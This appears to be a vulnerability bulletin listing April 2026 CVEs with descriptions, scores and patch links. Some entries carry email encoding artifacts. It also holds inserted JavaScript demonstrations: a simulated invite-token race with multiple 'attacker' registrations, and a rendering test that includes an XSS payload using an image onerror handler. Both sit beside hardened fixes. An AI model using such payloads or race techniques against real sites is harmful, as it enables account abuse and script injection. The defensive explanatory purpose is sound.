Juniper Networks--Junos OS A Missing Authorization vulnerability in the CLI of Juniper Networks Junos OS and Junos OS Evolved allows a local user with low privileges to read sensitive information. A local user with low privileges can execute the CLI command 'show mgd' with specific arguments which will expose sensitive information. This issue affects Junos OS: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S4, * 24.4 versions before 24.4R2-S1, * 25.2 versions before 25.2R1-S2, 25.2R2; Junos OS Evolved: * all versions before 23.2R2-S6-EVO, * 23.4 versions before 23.4R2-S6-EVO, * 24.2 versions before 24.2R2-S4-EVO, * 24.4 versions before 24.4R2-S1-EVO, * 25.2 versions before 25.2R2-EVO. 2026-04-09 5.5 CVE-2026-33776 [ https://www.cve.org/CVERecord?id=CVE-2026-33776 ] https://kb.juniper.net/JSA107866
Juniper Networks--Junos OS An Improper Check for Unusual or Exceptional Conditions vulnerability in the chassis control daemon (chassisd) of Juniper Networks Junos OS on SRX1600, SRX2300 and SRX4300 allows a local attacker with low privileges to cause a complete Denial of Service (DoS). When a specific 'show chassis' CLI command is executed, chassisd crashes and restarts, which causes a momentary impact to all traffic until all modules are online again. This issue affects Junos OS on SRX1600, SRX2300 and SRX4300: * 24.4 versions before 24.4R1-S3, 24.4R2. This issue does not affect Junos OS versions before 24.4R1. 2026-04-09 5.5 CVE-2026-33786 [ https://www.cve.org/CVERecord?id=CVE-2026-33786 ] https://kb.juniper.net/JSA107810
Juniper Networks--Junos OS An Improper Check for Unusual or Exceptional Conditions vulnerability in the chassis control daemon (chassisd) of Juniper Networks Junos OS on SRX1500, SRX4100, SRX4200 and SRX4600 allows a local attacker with low privileges to cause a complete Denial of Service (DoS). When a specific 'show chassis' CLI command is executed, chassisd crashes and restarts, which causes a momentary impact to all traffic until all modules are online again. This issue affects Junos OS on SRX1500, SRX4100, SRX4200 and SRX4600: * 23.2 versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S7, * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2, * 25.2 versions before 25.2R1-S1, 25.2R2. 2026-04-09 5.5 CVE-2026-33787 [ https://www.cve.org/CVERecord?id=CVE-2026-33787 ] https://kb.juniper.net/JSA107873
AcademySoftwareFoundation--openexr OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.2.0 to before 3.2.7, 3.3.9, and 3.4.9, a signed integer overflow exists in undo_pxr24_impl() in src/lib/OpenEXRCore/internal_pxr24.c at line 377. The expression (uint64_t)(w * 3) computes w * 3 as a signed 32-bit integer before casting to uint64_t. When w is large, this multiplication constitutes undefined behavior under the C standard. On tested builds (clang/gcc without sanitizers), two's-complement wraparound commonly occurs, and for specific values of w the wrapped result is a small positive integer, which may allow the subsequent bounds check to pass incorrectly. If the check is bypassed, the decoding loop proceeds to write pixel data through dout, potentially extending far beyond the allocated output buffer. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9. 2026-04-06 5.9 CVE-2026-34380 [ https://www.cve.org/CVERecord?id=CVE-2026-34380 ] https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-q3v8-hw4m-59w5 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9
vllm-project--vllm vLLM is an inference and serving engine for large language models (LLMs). From 0.16.0 to before 0.19.0, a server-side request forgery (SSRF) vulnerability in download_bytes_from_url allows any actor who can control batch input JSON to make the vLLM batch runner issue arbitrary HTTP/HTTPS requests from the server, without any URL validation or domain restrictions. This can be used to target internal services (e.g. cloud metadata endpoints or internal HTTP APIs) reachable from the vLLM host. This vulnerability is fixed in 0.19.0. 2026-04-06 5.4 CVE-2026-34753 [ https://www.cve.org/CVERecord?id=CVE-2026-34753 ] https://github.com/vllm-project/vllm/security/advisories/GHSA-pf3h-qjgv-vcpr
pnggroup--libpng LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.0.9 to before 1.6.57, passing a pointer obtained from png_get_PLTE, png_get_tRNS, or png_get_hIST back into the corresponding setter on the same png_struct/png_info pair causes the setter to read from freed memory and copy its contents into the replacement buffer. The setter frees the internal buffer before copying from the caller-supplied pointer, which now dangles. The freed region may contain stale data (producing silently corrupted chunk metadata) or data from subsequent heap allocations (leaking unrelated heap contents into the chunk struct). This vulnerability is fixed in 1.6.57. 2026-04-09 5.1 CVE-2026-34757 [ https://www.cve.org/CVERecord?id=CVE-2026-34757 ] https://github.com/pnggroup/libpng/security/advisories/GHSA-6fr7-g8h7-v645 https://github.com/pnggroup/libpng/issues/836 https://github.com/pnggroup/libpng/issues/837 https://github.com/pnggroup/libpng/commit/398cbe3df03f4e11bb031e07f416dfdde3684e8a https://github.com/pnggroup/libpng/commit/55d20aaa322c9274491cda82c5cd4f99b48c6bcc
projectzealous01--PZ Frontend Manager The PZ Frontend Manager plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 1.0.6. The pzfm_user_request_action_callback() function, registered via the wp_ajax_pzfm_user_request_action action hook, lacks both capability checks and nonce verification. This function handles user activation, deactivation, and deletion operations. When the 'dataType' parameter is set to 'delete', the function calls wp_delete_user() on all provided user IDs without verifying that the current user has the appropriate permissions. Notably, the similar pzfm_remove_item_callback() function does check pzfm_can_delete_user() before performing deletions, indicating this was an oversight. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary WordPress users (including administrators) by sending a crafted request to the AJAX endpoint. 2026-04-08 5.3 CVE-2026-3477 [ https://www.cve.org/CVERecord?id=CVE-2026-3477 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/90d8e345-b549-493b-a84b-abe56ab42a04?source=cve https://plugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/ajax-hooks.php#L331 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L331 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/ajax-hooks.php#L292 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L292 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/ajax-hooks.php#L290 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L290
Eniture technology--LTL Freight Quotes Worldwide Express Edition Missing Authorization vulnerability in Eniture technology LTL Freight Quotes - Worldwide Express Edition allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects LTL Freight Quotes - Worldwide Express Edition: from n/a through 5.2.1. 2026-04-07 5.3 CVE-2026-34899 [ https://www.cve.org/CVERecord?id=CVE-2026-34899 ] https://patchstack.com/database/wordpress/plugin/ltl-freight-quotes-worldwide-express-edition/vulnerability/wordpress-ltl-freight-quotes-worldwide-express-edition-plugin-5-2-1-broken-access-control-vulnerability?_s_id=cve
OceanWP--Ocean Extra Missing Authorization vulnerability in OceanWP Ocean Extra allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ocean Extra: from n/a through 2.5.3. 2026-04-07 5.4 CVE-2026-34903 [ https://www.cve.org/CVERecord?id=CVE-2026-34903 ] https://patchstack.com/database/wordpress/plugin/ocean-extra/vulnerability/wordpress-ocean-extra-plugin-2-5-3-broken-access-control-vulnerability?_s_id=cve
Heatmiser--Heatmiser Wifi Thermostat Heatmiser Wifi Thermostat 1.7 contains a cross-site request forgery vulnerability that allows attackers to change administrator credentials by tricking authenticated users into submitting malicious requests. Attackers can craft HTML forms targeting the networkSetup.htm endpoint with parameters usnm, usps, and cfps to modify the admin username and password without user consent. 2026-04-12 4.3 CVE-2019-25708 [ https://www.cve.org/CVERecord?id=CVE-2019-25708 ] ExploitDB-46100 [ https://www.exploit-db.com/exploits/46100 ] VulnCheck Advisory: Heatmiser Wifi Thermostat 1.7 Cross-Site Request Forgery [ https://www.vulncheck.com/advisories/heatmiser-wifi-thermostat-cross-site-request-forgery ]
GitLab--GitLab GitLab has remediated an issue in GitLab EE affecting all versions from 16.6 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that under certain circumstances could have allowed an authenticated user to have access to other users' email addresses via certain GraphQL queries. 2026-04-08 4.3 CVE-2025-9484 [ https://www.cve.org/CVERecord?id=CVE-2025-9484 ] GitLab Issue #565363 [ https://gitlab.com/gitlab-org/gitlab/-/issues/565363 ] HackerOne Bug Bounty Report #3303810 [ https://hackerone.com/reports/3303810 ] https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/
vsourz1td--Advanced Contact form 7 DB The Advanced Contact form 7 DB plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'vsz_cf7_export_to_excel' function in all versions up to, and including, 2.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to export form submissions to an Excel file. 2026-04-08 4.3 CVE-2026-0814 [ https://www.cve.org/CVERecord?id=CVE-2026-0814 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3de1a4-a534-475b-9138-2337755b0288?source=cve https://plugins.trac.wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin/class-advanced-cf7-db-admin.php#L1507 https://plugins.trac.wordpress.org/changeset/3497481/advanced-cf7-db
realmag777--BEAR Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net The BEAR - Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.5. This is due to missing nonce validation on the woobe_delete_tax_term() function. This makes it possible for unauthenticated attackers to delete WooCommerce taxonomy terms (categories, tags, etc.) via a forged request granted they can trick a site administrator or shop manager into performing an action such as clicking on a link. 2026-04-08 4.3 CVE-2026-1673 [ https://www.cve.org/CVERecord?id=CVE-2026-1673 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/1e4e8960-b0c1-4dbb-ba97-e45b88fb06c0?source=cve https://plugins.trac.wordpress.org/browser/woo-bulk-editor/trunk/index.php#L1474 https://plugins.trac.wordpress.org/changeset/3457263/ https://plugins.trac.wordpress.org/changeset/3465138/
GitLab--GitLab GitLab has remediated an issue in GitLab EE affecting all versions from 11.3 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user with developer-role permissions to modify protected environment settings due to improper authorization checks in the API. 2026-04-08 4.3 CVE-2026-1752 [ https://www.cve.org/CVERecord?id=CVE-2026-1752 ] HackerOne Bug Bounty Report #3533545 [ https://hackerone.com/reports/3533545 ] https://gitlab.com/gitlab-org/gitlab/-/work_items/588413 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/
arubadev--Aruba HiSpeed Cache The Aruba HiSpeed Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.4. This is due to missing nonce verification on the `ahsc_ajax_reset_options()` function. This makes it possible for unauthenticated attackers to reset all plugin settings to their default values via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2026-04-10 4.3 CVE-2026-1924 [ https://www.cve.org/CVERecord?id=CVE-2026-1924 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/d2230151-fde2-43d6-8bff-0d2ffd559ab3?source=cve https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.4/aruba-hispeed-cache.php#L632 https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.4/aruba-hispeed-cache.php#L631 https://plugins.trac.wordpress.org/changeset?old_path=%2Faruba-hispeed-cache/tags/3.0.4&new_path=%2Faruba-hispeed-cache/tags/3.0.5
GitLab--GitLab GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to access confidential issues assigned to other users via CSV export due to insufficient authorization checks. 2026-04-08 4.3 CVE-2026-2104 [ https://www.cve.org/CVERecord?id=CVE-2026-2104 ] HackerOne Bug Bounty Report #3541476 [ https://hackerone.com/reports/3541476 ] https://gitlab.com/gitlab-org/gitlab/-/work_items/589021 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/
    =C2=A0 idealwebdesignlk--Whole Enquiry Cart for WooCommerce The Whole Enqui=
    ry Cart for WooCommerce plugin for WordPress is vulnerable to Stored Cross-= Site Scripting via the 'woowhole_success_msg' parameter in all versions up = to, and including, 1.2.1 due to insufficient input sanitization and output = escaping. This makes it possible for authenticated attackers, with administ= rator-level access, to inject arbitrary web scripts in pages that will exec= ute whenever a user accesses an injected page. This only affects multi-site=
    installations and installations where unfiltered_html has been disabled. 2= 026-04-08 4.4 CVE-2026-2838 [ https://www.cve.org/CVERecord?id=3DCVE-2026-2= 838 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc14a98-1d= f8-480b-bae3-5ec057b498af?source=3Dcve https://plugins.trac.wordpress.org/browser/whole-cart-enquiry/trunk/admin.p= hp#L53
    =C2=A0 homarr-labs--homarr Homarr is an open-source dashboard. Prior to 1.5= 7.0, the user registration endpoint (/api/trpc/user.register) is vulnerable=
    to a race condition that allows an attacker to create multiple user accoun=
    ts from a single-use invite token. The registration flow performs three seq= uential database operations without a transaction: CHECK, CREATE, and DELET=
    E. Because these operations are not atomic, concurrent requests can all pas=
    s the validation step (1) before any of them reaches the deletion step (3).=
    This allows multiple accounts to be registered using a single invite token=
    that was intended to be single-use. This vulnerability is fixed in 1.57.0.=
    2026-04-06 4.2 CVE-2026-32602 [ https://www.cve.org/CVERecord?id=3DCVE-202= 6-32602 ] https://github.com/homarr-labs/homarr/security/advisories/GHSA-vf= w3-53q9-2hp8
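    The CHECK/CREATE/DELETE race in the Homarr entry above, as an added example that is not Homarr's own code: a deterministic JavaScript model of the three-step flow against an in-memory store, with several concurrent registrations interleaved one database step at a time, beside an atomic-claim variant that consumes the token in a single step. The store, the generator-based scheduler, the token value and the account names are constructed for this example; only the three-step sequence and the single-use-token invariant come from the advisory.

    ```javascript
    'use strict';

    // In-memory stand-in for the two tables involved: outstanding invite tokens and users.
    function makeDb(token) {
      return { invites: new Set([token]), users: [] };
    }

    // Vulnerable flow as the advisory describes it: CHECK, CREATE, DELETE as three separate
    // database operations with no transaction. Each `yield` is a point where the request is
    // waiting on the database and another concurrent request can run.
    function* registerRacy(db, token, username) {
      const valid = db.invites.has(token);   // (1) CHECK
      yield;
      if (!valid) return false;
      db.users.push(username);               // (2) CREATE
      yield;
      db.invites.delete(token);              // (3) DELETE
      return true;
    }

    // Hardened flow: consume the token in one atomic step that reports whether it was still
    // present (the equivalent of a conditional DELETE ... RETURNING, or CHECK+DELETE inside one
    // transaction holding a row lock), and only then create the account.
    function* registerAtomic(db, token, username) {
      const claimed = db.invites.delete(token);   // true for exactly one caller
      yield;
      if (!claimed) return false;
      db.users.push(username);
      return true;
    }

    // Round-robin scheduler: every in-flight request advances one step per round, which is
    // exactly the interleaving the advisory warns about (all pass (1) before any reaches (3)).
    function runInterleaved(requests) {
      const results = new Array(requests.length).fill(false);
      let pending = requests.map((gen, i) => ({ gen, i }));
      while (pending.length > 0) {
        const stillRunning = [];
        for (const entry of pending) {
          const step = entry.gen.next();
          if (step.done) results[entry.i] = step.value;
          else stillRunning.push(entry);
        }
        pending = stillRunning;
      }
      return results;
    }

    // Fire `attackers` registrations against one single-use token and report what is left.
    // Token and usernames are constructed values.
    function raceInviteToken(registerFlow, attackers = 5) {
      const token = 'invite-0123456789abcdef';
      const db = makeDb(token);
      const requests = Array.from({ length: attackers }, (_, i) => registerFlow(db, token, `attacker${i}`));
      const results = runInterleaved(requests);
      return {
        accountsCreated: db.users.length,
        successfulRequests: results.filter(Boolean).length,
        tokenStillValid: db.invites.has(token),
      };
    }

    console.log('racy  :', raceInviteToken(registerRacy));    // 5 accounts from one token
    console.log('atomic:', raceInviteToken(registerAtomic));  // 1 account, 4 rejected
    ```

    The scheduler is the point of the model: a real database makes the interleaving probabilistic, while the round-robin stepper forces the worst case every run, which is the property you want in a regression test for this class of bug. The atomic variant works because the claim and the existence check are the same operation; moving the DELETE before the CREATE without making it atomic would not be enough.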
    chamilo--chamilo-lms
      Description: Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Open Redirect vulnerability in the session course edit page allows an attacker to redirect an authenticated administrator to an arbitrary external URL after saving coach assignment changes. The redirect also leaks the id_session parameter to the attacker's server. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.
      Published: 2026-04-10 | CVSS Score: 4.7
      Source Info: CVE-2026-32932 [ https://www.cve.org/CVERecord?id=CVE-2026-32932 ]
      Patch Info: https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-q2cp-3qj3-wx8q https://github.com/chamilo/chamilo-lms/commit/b005b3d3e76cf6eafc03e15ac445ceff089551c0 https://github.com/chamilo/chamilo-lms/commit/fbd8d7eb37d05ec974293f05b6ffaaf9102ebd2b

    Microsoft--Microsoft Edge (Chromium-based)
      Description: Microsoft Edge (Chromium-based) Spoofing Vulnerability
      Published: 2026-04-10 | CVSS Score: 4.3
      Source Info: CVE-2026-33118 [ https://www.cve.org/CVERecord?id=CVE-2026-33118 ]
      Patch Info: Microsoft Edge (Chromium-based) Spoofing Vulnerability [ https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33118 ]

    Elastic--Kibana
      Description: Incorrect Authorization (CWE-863) in Kibana can lead to cross-space information disclosure via Privilege Abuse (CAPEC-122). A user with Fleet agent management privileges in one Kibana space can retrieve Fleet Server policy details from other spaces through an internal enrollment endpoint. The endpoint bypasses space-scoped access controls by using an unscoped internal client, returning operational identifiers, policy names, management state, and infrastructure linkage details from spaces the user is not authorized to access.
      Published: 2026-04-08 | CVSS Score: 4.3
      Source Info: CVE-2026-33460 [ https://www.cve.org/CVERecord?id=CVE-2026-33460 ]
      Patch Info: https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-25/385813

    themeum--Tutor LMS eLearning and online course solution
      Description: The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.9.7. This is due to missing authorization checks in the `save_course_content_order()` private method, which is called unconditionally by the `tutor_update_course_content_order` AJAX handler. While the handler's `content_parent` branch includes a `can_user_manage()` check, the `save_course_content_order()` call processes attacker-supplied `tutor_topics_lessons_sorting` JSON without any ownership or capability verification. This makes it possible for authenticated attackers with Subscriber-level access or above to detach lessons from topics, reorder course content, and reassign lessons between topics in any course, including admin-owned courses, by sending a crafted AJAX request with manipulated topic and lesson IDs.
      Published: 2026-04-11 | CVSS Score: 4.3
      Source Info: CVE-2026-3371 [ https://www.cve.org/CVERecord?id=CVE-2026-3371 ]
      Patch Info: https://www.wordfence.com/threat-intel/vulnerabilities/id/f9cf0430-8577-449a-aefe-d7bf606fe2de?source=cve https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L1687 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L1755 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L252 https://plugins.trac.wordpress.org/changeset?old_path=%2Ftutor/tags/3.9.7&new_path=%2Ftutor/tags/3.9.8

    Low Vulnerabilities

    Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info

    Mattermost--Mattermost
      Description: Mattermost Plugins versions <=2.3.1 fail to limit the request body size on the /lifecycle webhook endpoint, which allows an authenticated attacker to cause memory exhaustion and denial of service by sending an oversized JSON payload. Mattermost Advisory ID: MMSA-2026-00610
      Published: 2026-04-09 | CVSS Score: 3.7
      Source Info: CVE-2026-21388 [ https://www.cve.org/CVERecord?id=CVE-2026-21388 ]
      Patch Info: MMSA-2026-00610 [ https://mattermost.com/security-updates ]

    Dell--PowerProtect Agent
      Description: Dell PowerProtect Agent Service, version(s) prior to 20.1, contain(s) an Incorrect Permission Assignment for Critical Resource vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information exposure.
      Published: 2026-04-08 | CVSS Score: 3.3
      Source Info: CVE-2026-28264 [ https://www.cve.org/CVERecord?id=CVE-2026-28264 ]
      Patch Info: https://www.dell.com/support/kbdoc/en-us/000447277/dsa-2026-158-security-update-dell-powerprotect-data-manager-for-multiple-security-vulnerabilities

    pi-hole--web
      Description: Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, client hostnames and IP addresses from the FTL database are rendered into the DOM without escaping in network.js (Network page) and charts.js/index.js (Dashboard chart tooltips). While upstream validation in dnsmasq and FTL blocks HTML characters via normal DHCP/DNS paths, the web UI performs no output escaping, an inconsistency with other fields in the same file that are properly escaped. This vulnerability is fixed in 6.5.
      Published: 2026-04-06 | CVSS Score: 3.4
      Source Info: CVE-2026-33404 [ https://www.cve.org/CVERecord?id=CVE-2026-33404 ]
      Patch Info: https://github.com/pi-hole/web/security/advisories/GHSA-px6w-85wp-ww9v

    pi-hole--web
      Description: Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, the formatInfo() function in queries.js renders data.upstream, data.client.ip, and data.ede.text into HTML without escaping when a user expands a query row in the Query Log, enabling stored HTML injection. JavaScript execution is blocked by the server's CSP (script-src 'self'). The same fields are properly escaped in the table view (rowCallback), confirming the omission was an oversight. This vulnerability is fixed in 6.5.
      Published: 2026-04-06 | CVSS Score: 3.1
      Source Info: CVE-2026-33405 [ https://www.cve.org/CVERecord?id=CVE-2026-33405 ]
      Patch Info: https://github.com/pi-hole/web/security/advisories/GHSA-jx8x-mj2r-62vq
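    The missing output escaping in the two pi-hole entries above, as an added example that is not pi-hole's code: a renderer that splices database-sourced fields straight into markup, beside one that escapes each field where it enters the markup, both fed a constructed client record whose hostname carries HTML. The record shape, field names and helper names are assumptions of this example; the advisories only state which fields in which files were rendered unescaped.

    ```javascript
    'use strict';

    // Escape the five characters that matter in HTML text and double-quoted attribute values.
    function escapeHtml(value) {
      return String(value).replace(/[&<>"']/g, ch => ({
        '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
      })[ch]);
    }

    // Vulnerable pattern, as the advisories describe it: values read from the database are
    // concatenated into the HTML string unchanged, in both a text and an attribute position.
    function renderClientUnsafe(client) {
      return `<span title="${client.hostname}">${client.hostname}</span> (${client.ip})`;
    }

    // Hardened pattern: each field is escaped at the output boundary. The template's own
    // <span> is the only tag that can appear in the result.
    function renderClientSafe(client) {
      const host = escapeHtml(client.hostname);
      return `<span title="${host}">${host}</span> (${escapeHtml(client.ip)})`;
    }

    // Detector for the checks below: any tag other than the template's <span>/<\/span>.
    function hasInjectedTag(html) {
      return /<(?!\/?span\b)[a-z!\/]/i.test(html);
    }

    // Constructed records. The second hostname contains markup that a validated DHCP/DNS
    // path would reject; it stands in for whatever reaches the database unfiltered.
    const SAMPLE_CLIENTS = [
      { hostname: 'laptop.lan', ip: '192.168.1.20' },
      { hostname: 'x"><img src=x onerror=alert(1)>', ip: '192.168.1.66' },
    ];

    function renderAll(render) {
      return SAMPLE_CLIENTS.map(render);
    }

    console.log(renderAll(renderClientUnsafe));  // second entry breaks out of the title attribute
    console.log(renderAll(renderClientSafe));    // second entry is inert text
    ```

    Escaping in the attribute position matters as much as in the text position: the constructed hostname closes the `title` attribute first, so a renderer that only escapes text nodes would still be injectable. The second advisory's CSP note applies here too: `script-src 'self'` stops the `onerror` handler from running, so the unescaped output yields HTML injection rather than script execution, but escaping at render time removes even that.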
    OpenStack--Keystone
      Description: An issue was discovered in OpenStack Keystone 14 through 26 before 26.1.1, 27.0.0, 28.0.0, and 29.0.0. Restricted application credentials can create EC2 credentials. By using a restricted application credential to call the EC2 credential creation API, an authenticated user with only a reader role may obtain an EC2/S3 credential that carries the full set of the parent user's S3 permissions, effectively bypassing the role restrictions imposed on the application credential. Only deployments that use restricted application credentials in combination with the EC2/S3 compatibility API (swift3 / s3api) are affected.
      Published: 2026-04-10 | CVSS Score: 3.5
      Source Info: CVE-2026-33551 [ https://www.cve.org/CVERecord?id=CVE-2026-33551 ]
      Patch Info: https://bugs.launchpad.net/keystone/+bug/2142138 https://security.openstack.org/ossa/OSSA-2026-005.html

    harttle--liquidjs
      Description: LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to 10.25.3, the replace filter in LiquidJS incorrectly accounts for memory usage when the memoryLimit option is enabled. It charges str.length + pattern.length + replacement.length bytes to the memory limiter, but the actual output from str.split(pattern).join(replacement) can be quadratically larger when the pattern occurs many times in the input string. This allows an attacker who controls template content to bypass the memoryLimit DoS protection with approximately 2,500x amplification, potentially causing out-of-memory conditions. This vulnerability is fixed in 10.25.3.
      Published: 2026-04-08 | CVSS Score: 3.7
      Source Info: CVE-2026-34166 [ https://www.cve.org/CVERecord?id=CVE-2026-34166 ]
      Patch Info: https://github.com/harttle/liquidjs/security/advisories/GHSA-mmg9-6m6j-jqqx https://github.com/harttle/liquidjs/commit/abc058be0f33d6372cd2216f4945183167abeb25 https://github.com/harttle/liquidjs/releases/tag/v10.25.3
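    The under-accounting in the LiquidJS entry above, as an added example that is not LiquidJS's code: the charge the advisory describes, beside an exact pre-computation of the split/join output size and a replace filter that refuses before allocating when that size exceeds the limit. Function names, the limit value and the sample inputs are this example's own; the charging formula and the split/join expression are taken from the advisory text.

    ```javascript
    'use strict';

    class MemoryLimitExceeded extends Error {}

    // The charge the advisory describes: only the three input lengths are counted.
    function naiveCharge(str, pattern, replacement) {
      return str.length + pattern.length + replacement.length;
    }

    // Number of separators String.prototype.split produces for this pattern, i.e. the number
    // of times join() will insert `replacement`. split('') splits between every code unit.
    function countJoins(str, pattern) {
      if (pattern.length === 0) return str.length === 0 ? 0 : str.length - 1;
      let count = 0;
      let idx = str.indexOf(pattern);
      while (idx !== -1) {
        count += 1;
        idx = str.indexOf(pattern, idx + pattern.length);   // non-overlapping, like split()
      }
      return count;
    }

    // Exact length (UTF-16 code units) of str.split(pattern).join(replacement), without
    // building the string: removed pattern bytes out, inserted replacement bytes in.
    function exactOutputSize(str, pattern, replacement) {
      const joins = countJoins(str, pattern);
      return str.length - joins * pattern.length + joins * replacement.length;
    }

    // Hardened filter: size the output first and refuse before allocating it.
    function replaceWithLimit(str, pattern, replacement, memoryLimit) {
      const needed = exactOutputSize(str, pattern, replacement);
      if (needed > memoryLimit) {
        throw new MemoryLimitExceeded(`replace would produce ${needed} code units, limit is ${memoryLimit}`);
      }
      return str.split(pattern).join(replacement);
    }

    // How far the naive charge undercounts for a given input.
    function amplification(str, pattern, replacement) {
      return exactOutputSize(str, pattern, replacement) / naiveCharge(str, pattern, replacement);
    }

    // Constructed attacker-style input: a string made of nothing but the pattern, replaced
    // with a long replacement. The charge grows linearly in n, the output quadratically.
    const ATTACK = { str: 'a'.repeat(1000), pattern: 'a', replacement: 'b'.repeat(1000) };

    console.log('charged:', naiveCharge(ATTACK.str, ATTACK.pattern, ATTACK.replacement));
    console.log('actual :', exactOutputSize(ATTACK.str, ATTACK.pattern, ATTACK.replacement));
    console.log('x', amplification(ATTACK.str, ATTACK.pattern, ATTACK.replacement).toFixed(1));
    ```

    With n repetitions of a one-character pattern and an n-character replacement the charge is 2n+1 while the output is n squared, which is the quadratic growth the advisory refers to; the 1000/1000 input here is charged 2001 code units for a 1,000,000 code unit result. Computing the size before the allocation is the only accounting that cannot be gamed by a template author, since any estimate made from the inputs alone is bounded by the inputs.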
    electron--electron
      Description: Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. From 33.0.0-alpha.1 to before 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5, apps that use offscreen rendering with GPU shared textures may be vulnerable to a use-after-free. Under certain conditions, the release() callback provided on a paint event texture can outlive its backing native state, and invoking it after that point dereferences freed memory in the main process, which may lead to a crash or memory corruption. Apps are only affected if they use offscreen rendering with webPreferences.offscreen: { useSharedTexture: true }. Apps that do not enable shared-texture offscreen rendering are not affected. To mitigate this issue, ensure texture.release() is called promptly after the texture has been consumed, before the texture object becomes unreachable. This vulnerability is fixed in 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5.
      Published: 2026-04-06 | CVSS Score: 2.3
      Source Info: CVE-2026-34764 [ https://www.cve.org/CVERecord?id=CVE-2026-34764 ]
      Patch Info: https://github.com/electron/electron/security/advisories/GHSA-8x5q-pvf5-64mp

    electron--electron
      Description: Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5, apps that call clipboard.readImage() may be vulnerable to a denial of service. If the system clipboard contains image data that fails to decode, the resulting null bitmap is passed unchecked to image construction, triggering a controlled abort and crashing the process. Apps are only affected if they call clipboard.readImage(). Apps that do not read images from the clipboard are not affected. This issue does not allow memory corruption or code execution. This vulnerability is fixed in 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5.
      Published: 2026-04-07 | CVSS Score: 2.8
      Source Info: CVE-2026-34781 [ https://www.cve.org/CVERecord?id=CVE-2026-34781 ]
      Patch Info: https://github.com/electron/electron/security/advisories/GHSA-f37v-82c4-4x64

    Severity Not Yet Assigned

    Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info

    chamilo--chamilo-lms
      Description: Chamilo LMS is a learning management system. From 1.11.0 to 2.0-beta.1, anyone can trigger a malicious redirect through the use of the redirect parameter to /login. This vulnerability is fixed in 2.0-beta.2.
      Published: 2026-04-10 | CVSS Score: not yet calculated
      Source Info: CVE-2025-66447 [ https://www.cve.org/CVERecord?id=CVE-2025-66447 ]
